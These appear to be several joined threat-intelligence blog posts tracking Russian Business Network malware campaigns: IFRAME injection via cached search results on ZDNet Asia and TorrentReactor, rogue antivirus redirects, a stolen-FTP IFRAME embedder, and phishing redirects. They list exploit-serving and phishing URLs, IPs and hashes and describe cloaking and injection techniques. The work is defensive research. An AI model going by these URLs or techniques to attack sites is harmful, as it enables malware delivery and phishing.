Rogue RBN Software Pushed Through Blackhat SEO

On numerous occasions in the past, I emphasized on the malicious attacker Keep it Simple Stupid (KISS) approach for anything starting from Rock Phishing, to maintaining a huge live exploits domains portfolio hosted on a single IP. This is yet another example of the KISS strategy uncovering another huge IFRAME campaign, again taking advantage of locally cached pages generated upon searching for a particular word, and the IFRAME itself. In the previous example for instance, we had an second ongoing IFRAME campaign with just 4 pages injected with 89.149.243.201, however, what Keep it Simple Stupid really means in this case is that the next IP in their netblock 89.149.243.202 is currently getting injected at many other sites as well. The difference between the previous campaign and this one, is that the previous one was targeting just two high page rank-ed sites, while in the second one, the malicious parties pushing RBN's rogue XP AntiVirus are relying on a much more diverse set of domains loading the IFRAME. One factor remains the same, both campaigns continue pushing the rogue XP AntiVirus. XP AntiVirus's pitch, note the downloads success rate mentioned and how they forgot to change the template used in the campaign by putting the rogue's name :

"XP antivirus has been downloaded over 4 Million times; with a 20,000 more downloads every week. Millions of people worldwide use Spyware Doctor to protect their identity and PC security. XP antivirus has consistently been awarded Editors' Choice, by leading PC magazines and testing laboratories around the world, including United States, United Kingdom, Germany and Australia. All current versions of XP antivirus have won Editors' Choice awards from Secure Home PC Magazine in United States. XP antivirus is advanced technology designed specially for people, not experts. It is automatically configured out of the box to give you optimal protection with limited interaction so all you need to do is install it for immediate and ongoing protection. XP antivirus's advanced RealOnGuard technology only alerts users on a true Spyware detection. This is significant because you should not be interrupted by cryptic questions every time you install software, add a site to your favorites or change your PC settings."

Upon visiting 89.149.243.202/t and 89.149.243.202/a we get forwarded to bestsexworld.info/soft.php?aid=0064&d=3&product=XPA (72.232.224.154) and from there to xpantivirus2008.com (69.50.173.10). There're in fact several other domains currently promoting this as well : xpantiviruspro.com (69.50.183.50); xpdownloadings.com (69.50.183.50); xpantivirus.com (216.255.180.58), as well as the following : hotantivirus.info (74.86.81.80); easyantivirus.info (74.86.81.80); a2zantivirus.com (74.86.81.80). The downloader's detection rate :

Scanner results : 17% Scanner(6/36) found malware!
Time : 2008/03/05 13:57:48 (EET)
File Size : 47104 byte
MD5 : 2102cb53606f535ca8132c3324953596
SHA1 : 0756f530e782c3d2e85a8186e052b722b017f1ea
AntiVir - TR/Crypt.ULPM.Gen
Fortinet - Suspicious
Microsoft - Trojan:Win32/Vxidl.gen!B(Suspicious)
Panda - Suspicious file
Prevx - TROJAN.DOWNLOADER.GEN
Sophos - Mal/HckPk-A

Smells like RBN's used InterCage and ATRIVO netblocks from routers away.

Related RBN coverage:
RBN's Phishing Activities
RBN's Puppets Need Their Master
RBN's Fake Account Suspended Notices
A Diverse Portfolio of Fake Security Software
Go to Sleep, Go to Sleep my Little RBN
Exposing the Russian Business Network
Detecting the Blocking the Russian Business Network
Over 100 Malwares Hosted on a Single RBN IP
RBN's Fake Security Software
The Russian Business Network

ZDNet Asia and TorrentReactor IFRAME-ed

UPDATED: More CNET Sites Under IFRAME Attack; Rogue RBN Software Pushed Through Blackhat SEO.

This currently ongoing malware embedded attack aimed at ZDNet Asia and TorrentReactor is very creative at the strategic level, whereas the IFRAME-ing tactic remains the same. The sites' search engines seem to have been exploited to have the IFRAME injected, not embedded, within the last 24 hours, redirecting to known Russian Business Network's IPs and ex-customers in the face of rogue anti-virus and anti-spyware applications. For the time being, zdnetasia.com has 11,200 cached pages loading the IFRAME, and torrentreactor.net - 29,300 cached pages loading the IFRAME. Even worse, the IFRAME embedded search results hosted on their sites, are appearing between the first ten to twenty search results, thanks to the sites high page ranks. Sample search queries :

jamie presley

mari misato

risa coda

kasumi tokumoto

jill criscuolo

The IFRAME is loading 72.232.39.252/a also responding to themaleks.net. The link itself is loading an obfuscated javascript, which once deobfuscated attempts to load a-n-d-the.com/wtr/router.php (216.255.185.82 - INTERCAGE-NETWORK-GROUP2) also responding to ppcan.info, with two more domains sharing nameservers, findhowto.net, searchhowto.net. Ppcan.net has already been assessed by Microsoft's Security Team :

"The advantage gained by faking the Referer field is nullified when pages use client-side cloaking to distinguish between fake and real Referer field data by running a script in the client’s browser to check the document.referrer variable. Example 1 shows a script used by the spam URL naha.org/old/tmp/evans-sara-real-fine-place/index.html. The script checks whether the document.referrer string contains the name of any major search engines. If successful the browser redirects to ppcan.info/mp3re.php and eventually to spam; otherwise, the browser stays at the current doorway page. To defeat the simple client-side cloaking, issuing a query of the form “url:link1” is sufficient. This allows us to fake a click through from a real search engine page."

So the malicious parties are implementing simple referrer techniques to verify that the end users coming to their IP, are the ones they expect to come from the campaign, and not client-side honeypots or even security researchers. And if you're not coming from you're supposed to come, you get a 404 error message, deceptive to the very end of it. Sample redirects upon visiting the IFRAME-ed pages at ZDNet Asia with the right referrer :

xpantivirus2008.com (69.50.173.10)

scanner.spyshredderscanner.com (77.91.229.106)

hot-pornotube-2008.com (206.51.229.67)

porn-tubecodec20.com (195.93.218.43)

Once the junkware inventory is empty, all pages redirect to requestedlinks.com (216.255.185.82). Let's take a peek at the codec :

Scanner results : 11% Scanner (4/36) found malware!

File Size : 85008 byte

MD5 : 6b325c53987c488c89636670a25d5664

SHA1 : c6aeeafffe10e70973a45e5b6af97304ca20b3bd

Fortinet - Suspicious

Norman - Tibs.gen200

Prevx - TROJAN.DOWNLOADER.GEN

Quick Heal - Suspicious - DNAScan

Even more interesting is the fact that literally minutes before posting this, another such campaign got launched at ZDNet Asia, this time having just 24 pages locally cached, and loading another IFRAME to 89.149.243.201/a redirecting to cialis2men.com/product/61 (92.241.162.154).

What is going on, have the sites been compromised, or the attackers are in fact smarter than those who would even bother to scan for remotely exploitable web application vulnerabilities, next to remote file inclusion? ZDNet Asia and TorrentReactor themselves aren't compromised, their SEO practices of locally caching any search queries submitted are abused. Basically, whenever the malicious attacker is feeding the search engine with popular quaries, the sites are caching the search results, so when the malicious party is also searching for the IFRAME in an "loadable state" next to the keyword, it loads. Therefore, relying on the high page ranks of both sites, the probability to have the cached pages with the popular key words easy to find on the major search engines, with the now "creative" combination of the embedded IFRAME, becomes a reality if you even take a modest sample, mostly names.

The bottom line is that ZDNet Asia and TorrentReactor SEO practices of caching the search queriesAnd given that the malicius parties can now easily tweak popular keywords to appear on ZDNet Asia and TorrentReactor's sites, thereby getting a front placement on search engines, they can pretty much shift the SEO campaign to a malware campaign by taking advantage of "event-based social engineering".

Embedding Malicious IFRAMEs Through Stolen FTP Accounts

Keywords for gaining attention from a marketing perspective for last week - embedded malware, IFRAMEs, stolen FTP accounts, Fortune 500 companies, Russia. Nothing's wrong with that unless of course you're interested in the whole story and the big picture, which wouldn't be excluding the possibility for having a Fortune 500 company's servers acting as C&Cs for a large botnet. Why are Fortune 500 servers excluded as impossible to get hacked at the first place, making it look like that the amount of money spent on security is proportional with the level of security reached? The more you spend does not mean the more secure it gets if you're not allocating the money where they have to be allocated at, in a particular moment of time, given the dynamic threatscape these days.

What's most important to point out about the recent incident of Fortune 500 companies stolen FTP accounts, is that it's "stolen accounting data for sale" as usual, as usual in the sense of the hundreds of other such propositions currently active online. And if we're to use an analogy on its importance as a event, it's like your smell receptors, namely the more you use a particular fragnance, the less you're capable of sensing it since you're getting used to the smell. In this line of thoughts, what's "stolen accounting data for sale as usual" for some, is exclusive event for others. Even worse, it's "slicing the threat on pieces" compared to discussing the "pie" itself. Moreover, the shift from products to services in the underground marketplace is something that's been happening for the past three years, and therefore making it sound like it's been happening as of yesterday, brings the discussion to the lowest possible level - right from the very beginning. Try the following malicious services on demand for instance, demostranting key business concepts such as consolidation, vertical integration, benchmarking -Q&A, and standartization :

- Wild Wild Underground

- DDoS on Demand VS DDoS Extortion

- Malware as a Web Service

- Multiple Firewalls Bypassing Verification on Demand

- Managed Spamming Appliances - The Future of Spam

- Botnet on Demand Service

- DIY CAPTCHA Breaking Service

- Managed Fast-Flux Provider

- Which CAPTCHA Do You Want to Decode Today?

- Localizing Cybercrime - Cultural Diversity on Demand

On the other side of the universe :

"The concept of Software-as-a-Service (SaaS) is nothing new, but this is the first time anyone has organized the purchase of FTP login credentials, with additional tools available to help a buyer confirm he's making a smart purchase."

on the other side of the universe on Neosploit's "purpose in life" :

"The information was available for blackmarket trade, along with the NeoSploit version 2 crimeware toolkit, a malicious application specifically designed to abuse and trade stolen FTP account credentials from numerous legitimate companies."

Robert Lemos is however, reasonably pointing out that :

"The tool, which is at least a year old, was described by antivirus firm Panda Software in June 2007."

Key summary points :

- the tool's been around since February, 2007, making it exactly one year old

- it has built-in accounting data validation, pagerank measurement of the sites whose FTP accounting data has been stolen as you can see in the third screenshot attached

- IP Geolocation for the now pagerank-ed sites is also included

- the tool's functions are relatively primitive compared to three other alternative ones that I'm aware of taking advantage of anything by stolen FTP accounts, a logical fad by itself

- the script is officially sold for $25, but as we've seen it in the past with MPack and IcePack, buyers unaware of other outlets for the tool would pay the high-profit margins offered by the seller

- FTP accounting data can be imported, and once verified, a statistical output for the automated process of logging in and embedding the IFRAME is provided

- IFRAMEs are automatically embedded within .php; .html; .asp; .htm extensions

- embedding iframes through stolen FTP accounts is a fad, purchasing and selling shells/web backdoors and huge domain portfolios controlled via Cpanels is a trend, as automatic injection of malicious IFRAMEs through remote file inclusion and remotely exploitable SQL injection vulnerabilities is

Your situational awareness about the emerging threatspace is as always up to the information sources that you use, or still haven't started using. My point is that exposing Pinch in the summer of 2007 despite that the tool's been around since 2004/2005, and exposing this malicious FTP account checker and IFRAMEs embedder in February, 2008, when it hasn't been updated since February, 2007, greatly contributes to the development of a twisted situational awareness. Realizing it or not, with the time, security researchers or intelligence analysts establish a very good sense of intuition about what's happening at a particular moment in time, or what will be happening anytime now. And using stolen FTP accounts for embedding IFRAMEs never picked up as a tactic, compared to using the stolen FTP accounts for hosting blackhat SEO content. Scenario building intelligence, or playing the devil's advocate, it's a mindset only a small crowd possess.

RBN's Phishing Activities

As we're on the topic of RBN's zombies trying to connect to their old netblocks, and botnets being used to host and send out phishing content, what looks like entirely isolated incidents in the present, is what has actually being going on on RBN's network during the summer of 2007. A picture is worth a thousand speculations, yes it is. As you can see in the attached historical screenshot of a web based botnet C&C, the Russian Business Network's old infrastructure has also been involved into delivering phishing pages to malware infected hosts, whose requests to the legitimate sites were getting forwarded to RBN's old netblock. The process is too simple, thereby lowering the entry barriers into phishing activities due to its modularity. Basically, the botnet master can easily configure to which fake phishing site the infected population would be redirected to, if they are to visit the original one with no more than three clicks. And so, for the purpose of historical preservation of CYBERINT data given the quality of the identical screenshot obtained through OSINT techniques -

RBN URLs used in the phishing redirects :
81.95.149.226/scm/us/wels/index.html
81.95.149.226/scm/uk/lloydstsb/personal/index.html
81.95.149.226/scm/cyprus/persmain.html
81.95.149.226/scm/au/westpac/index.html
81.95.149.226/scm/au/commonwealth/
81.95.149.226/scm/au/warwickcreditunion/index.html
81.95.149.226/scm/uk/lloydstsb/business/index.html
81.95.149.226/scm/uk/halifax.php
81.95.149.226/scm/uk/rbsdigital/index.html
81.95.149.226/scm/uk/co-operative/index.html
81.95.149.226/scm/uk/cahoot.php

Known malware to have been connecting to 81.95.149.226 :
Trojan-PSW.Win32.LdPinch.bno, Trojan-Downloader.Win32.Small.emg, Trojan.Nuklus, where the malware detected under different names by multiple vendors is the only one that ever made a request to 81.95.149.226, which in a combination with the fact that the screenshot is made out of Nuklus production speaks for itself.

Some facts are better known later, than never.

Yet Another Massive Embedded Malware Attack

The following central redirection point in a portfolio of exploits and malware serving domains - buytraffic.cn/in.cgi?11 is currently embedded at couple of hundred sites and forums across the web. And just like the many previous such examples, the process is automated to the very last stage. Repeated requests expose the entire domains portfolio, where once the live exploit is served with the help of a javascript obfuscations, the binaries come into play. Here are all the domains and live exploit URLs involved for this particular campaign :

buytraffic.cn/in.cgi?11 - 62.149.18.34
sclgntfy.com/ent2763.htm - 85.255.118.12
tds-service.net/in.cgi?20 - 72.233.50.148
spywareisolator.com/landing/?wmid=sga - 72.233.50.150
warinmyarms.com/check/upd.php?t=670 - 58.65.239.114
coripastares.com/in.php?adv=1267&val=3ee328 - 202.83.197.239
xanjan.cn/in.cgi?mikh - 78.109.22.246
chportal.cn/top/count.php?o=4 - 203.117.111.102
buhaterafe.com/in.php?adv=1208&val=65286d - 202.83.197.239
193.109.163.179/exp/count.php
193.109.163.179/exp/getexe.php
78.109.22.242/mikh/1.html
78.109.22.242/sh.html

Who says there's no such thing as free malware cocktails.

Related posts :
MDAC ActiveX Code Execution Exploit Still in the Wild
Malware Serving Exploits Embedded Sites as Usual
Massive RealPlayer Exploit Embedded Attack
Syrian Embassy in London Serving Malware
Bank of India Serving Malware
U.S Consulate St. Petersburg Serving Malware
The Dutch Embassy in Moscow Serving Malware
U.K's FETA Serving Malware
Anti-Malware Vendor's Site Serving Malware
The New Media Malware Gang - Part Three
The New Media Malware Gang - Part Two
The New Media Malware Gang
A Portfolio of Malware Embedded Magazines
Another Massive Embedded Malware Attack
I See Alive IFRAMEs Everywhere
I See Alive IFRAMEs Everywhere - Part Two

RBN's Malware Puppets Need Their Master

Despite that it's already been a couple of months since RBN's main ASN got "withdrawn" from the Internet due the public pressure put on the Russian Business Network's malicious activities, hundreds of malware variants continue trying to access their C&Cs and update locations from RBN's old netblock. Malware puppets with no master to connect to despite their endless efforts - now these are the real zombies if we're to stick to the terminology. Catch up with more details on RBNs migration, and extended partnership network.